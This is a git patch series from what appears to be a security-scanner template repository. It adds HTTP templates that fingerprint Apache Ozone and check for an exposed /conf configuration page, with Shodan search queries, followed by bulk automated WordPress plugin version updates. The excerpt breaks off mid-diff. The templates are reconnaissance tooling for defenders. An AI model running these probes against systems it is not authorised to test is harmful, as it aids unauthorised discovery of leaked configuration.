.../apache/apache-ozone-detect.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/technologies/apache/apache-ozone-detect.yaml diff --git a/http/technologies/apache/apache-ozone-detect.yaml b/http/technologies/apache/apache-ozone-detect.yaml new file mode 100644 index 00000000000..7b18255a1c3 --- /dev/null +++ b/http/technologies/apache/apache-ozone-detect.yaml @@ -0,0 +1,32 @@ +id: apache-ozone-detect + +info: + name: Apache Ozone - Detect + author: icarot + severity: info + description: | + Detects a Apache Ozone web application, a scalable, redundant, and distributed object store for Hadoop and Cloud-native environments. + classification: + cpe: cpe:2.3:a:apache:ozone:-:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + vendor: apache + product: ozone + shodan-query: title:"Apache Ozone" + tags: tech,ozone,apache,detect + +http: + - method: GET + path: + - "{{BaseURL}}/static/" + + matchers-condition: and + matchers: + - type: word + words: + - 'Apache Ozone' + + - type: status + status: + - 200 From 4ec59411ea1559d3e78335120cc2fe08c4d2c1eb Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Sun, 14 Jul 2024 15:15:18 -0300 Subject: [PATCH 138/247] Create apache-ozone-conf.yaml Detects if path /conf of Apache Ozone web application is exposed. --- http/exposures/configs/apache-ozone-conf.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/exposures/configs/apache-ozone-conf.yaml diff --git a/http/exposures/configs/apache-ozone-conf.yaml b/http/exposures/configs/apache-ozone-conf.yaml new file mode 100644 index 00000000000..5c80a56ec36 --- /dev/null +++ b/http/exposures/configs/apache-ozone-conf.yaml @@ -0,0 +1,32 @@ +id: apache-ozone-conf + +info: + name: Apache Ozone - Exposure + author: icarot + severity: info + description: | + Detects if path /conf of Apache Ozone web application is exposed. + classification: + cpe: cpe:2.3:a:apache:ozone:-:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: ozone + shodan-query: title:"Apache Ozone" + tags: tech,ozone,apache,detect + +http: + - method: GET + path: + - "{{BaseURL}}/conf" + + matchers-condition: and + matchers: + - type: word + words: + - 'ozone-default.xml' + - 'ozone' + + - type: status + status: + - 200 From 8e2078308fb03b4c62e011cc11367074fc174be8 Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Sun, 14 Jul 2024 15:16:54 -0300 Subject: [PATCH 139/247] Update apache-ozone-detect.yaml Detects if path /conf of Apache Ozone web application is exposed. --- http/technologies/apache/apache-ozone-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/technologies/apache/apache-ozone-detect.yaml b/http/technologies/apache/apache-ozone-detect.yaml index 7b18255a1c3..2e7d2b908fc 100644 --- a/http/technologies/apache/apache-ozone-detect.yaml +++ b/http/technologies/apache/apache-ozone-detect.yaml @@ -10,7 +10,6 @@ info: cpe: cpe:2.3:a:apache:ozone:-:*:*:*:*:*:*:* metadata: max-request: 1 - verified: true vendor: apache product: ozone shodan-query: title:"Apache Ozone" From c7320d04e520f0137c27aa5222cc5726d9a5803b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 00:20:42 +0000 Subject: [PATCH 140/247] Auto WordPress Plugins Update [Mon Jul 15 00:20:42 UTC 2024] :robot: --- helpers/wordpress/plugins/elementskit-lite.txt | 2 +- helpers/wordpress/plugins/wp-fastest-cache.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 202 files changed, 2 insertions(+), 202 deletions(-) diff --git a/helpers/wordpress/plugins/elementskit-lite.txt b/helpers/wordpress/plugins/elementskit-lite.txt index a4f52a5dbb5..0444f320767 100644 --- a/helpers/wordpress/plugins/elementskit-lite.txt +++ b/helpers/wordpress/plugins/elementskit-lite.txt @@ -1 +1 @@ -3.2.0 \ No newline at end of file +3.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-fastest-cache.txt b/helpers/wordpress/plugins/wp-fastest-cache.txt index 5975b143a0f..434dcac4fa6 100644 --- a/helpers/wordpress/plugins/wp-fastest-cache.txt +++ b/helpers/wordpress/plugins/wp-fastest-cache.txt @@ -1 +1 @@ -1.2.8 \ No newline at end of file +1.2.9 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 066e4001bcf..3fd2256749a 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201a0cb2289816c51f7d36609c737196ba9a1de7ca813f2e1c9361b6c34bf4de9f022100ddf473616f26f1f04152d8036ebbf20764f2e91b969c6b3e1f54409dc1abebb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 90dc7553651..6a0d344b632 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009528fd2c65974432e6f8ff3697d8719250ac544be7e171cf685615b506b9b69d0221009b9d0ff3a696228306574998d4a26ff3c5368cff1d838c45555adf6f75e10d9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 504e97ec62f..6fb5080bc80 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220057ea8832bdc60d651f2654347529120ffd352f18002fcabb2756795fc12eee20220200fade18948114ad83c81847a1057882b4b58f25ac2491bf2588bad2125fdf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 721e9eb64ec..cddbb4bb2ed 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022001982ddbab3738ad1af4fd6d3e56375d33cb8e0a20eecba41d6ecc58e9f34999022100fa06ddd8f8181b3d733d09c42483fe69582171845ede52f76443e14e6964e1f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index b277969d45f..6f253f9f556 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f2695462fb853c9b01b1fa9c062bc1121bd7d95154f44d8537574f36b96e0b87022100fc9614d4d9b67ae0285cf7b3bb1ae0d90a693221e74c1777c561a2613e5760f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 765cb1bf1c7..fe45de4d042 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c6a12b9f233708e392ad44588610edc52d0827438ca0e213e34dc1fd5ddca4f702210082d613b28f2a1db85b1e68df6c70c6163d58e3c992655ad6e3e33ae91e2e0444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index bd455711b44..69e425f4469 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008874122a4bf0f3c5953fd919733113711ee88e4aa73b2922206e2168a99ca005022100d778ab6bbb0d85b2cb9a8f63be94fb04bfa5c68aa2a857d1e645f7c7c630ca9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index e33bd20e132..9c07c65e4e6 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220239d566a18761cd95a4238081fe8aa9428ee67b734e8e6a5674432b1c0b4f162022100cb59f217b5dd088af2b2398ca68838c9c4a7fd9d8dc7163502a478b1a82ff70a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 321a6701280..92c8f5656e9 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210086b860ddcc5181903f1c83a2e9c28bcba6613216e9a85d47c57dff855477be6f022001cab48543e5e972bb7d3c89c2135d6670aada07dcd939ce538a2621ecbcf583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index dc524611649..70975a19a1f 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100856786cfd664461b6f5cf373bd622ae4cd4f2fd25446c276801dc27d13dac1be022100e4559f028ce3ea893fedc8a1c6f909e323d3dfa2032da8a207300ef4e0b391b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 718e001cdc9..fd7e3e99dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100988dfa0f3147880459aff2eb4db8397ad8c20d780da0b6dded3d49bb3855f8d6022070b8dd9c1c6aabb463ac5d1d55fc85395de93a12a2d9dc97f8b89717b2137c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 94ed2587b8a..18f2a2ae84c 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eea0c35055952c71bca538bb2820c12cfcc5449eca2f21d123e988b28804fdba022100f2db4befa6d71c0518bb22603718e1d283bb5a79449a78fd19d5a5565124864a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 7801b47b2c6..11cb41fb2ce 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022021e60243d14264e9dba8ea688de5b3474409961c36bceb3ecfc09171bcafd475022100c33014209c734b729eeaaedc749e5e5ea456b8648aaee1b987eb3f8ad83bec59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index de4a3b8ddb2..df3c5f3a944 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022038dc6e4638b425b5c25976c6a1ea2bbfebec41f45b353b081972a9314b8fe2a102202d51ccf11bdfb224f3e4caedd48da06c7c85373f3fa0944e5e8b11020a54e677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index c56781aac8e..6a50e049dca 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100833b1ffc11abade5c875fce3d07c63d9df43fd821f22d95314ff3d7276191e71022100892462b0364fece5d18dc06cf1bfd3ff5c808c56ad0581a0e134dd3f4a7989c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 2480f3a0c0a..e5326941673 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022014a7654a0343a4db574d42a785f280296cf6ac3b8e7133be43cab8809ebcaa78022100aebe35821a8eaeddd05714b5badf8de012cf8b882f6e243c736bad9b827af5d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 14b6b44810e..4c6e616c1d6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009be4d87621bc01277bdaaadc7a98c3d6f17f072f80f98a6df235908e3a957b2e022043dff2aa121f603f99e8d25ad5038dc3c48dd212374ba02be929e36d2d3dd4ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index d79ddfaf482..a70a58690c3 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202e39b2756daa59459c406d092c2c75393051516742ac57f8b488f8c9ff392945022100a452e401c81268b1a0f861b68bbfbe4761ec17e15f5b49dc09baead17ee5c8c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 0d9b1fa0c86..4e3c68c53a3 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210088b6b1abdee2eeb78ffbaf5802926921bf60e1eeff3a0551f56876d1d5d6523902203335beb0338c0be9d89d2dfd72bb400e2fe7c2f2c8301753a8501f2a88e26c0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 7a0487e1b22..0cd866179ee 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7578a7d3a717a899ce4f9e68823c4fe2aaaddbd1f34c96af5d0198f6537db10022078beba8ef443b4a45287dcc0fda1a6d4ebab34ca9d94e51c7128a608dcf6bb7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 92f9afe25dd..b1d8479d139 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220638358339c4bd7bdb22bb16f4e48bdedb5ebaa09f530f4eef9ba390fc8ab0cf00220446285b50faf2fb5f563b6202b2701f99d86a38f88b499b59861a41c1914a5cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml 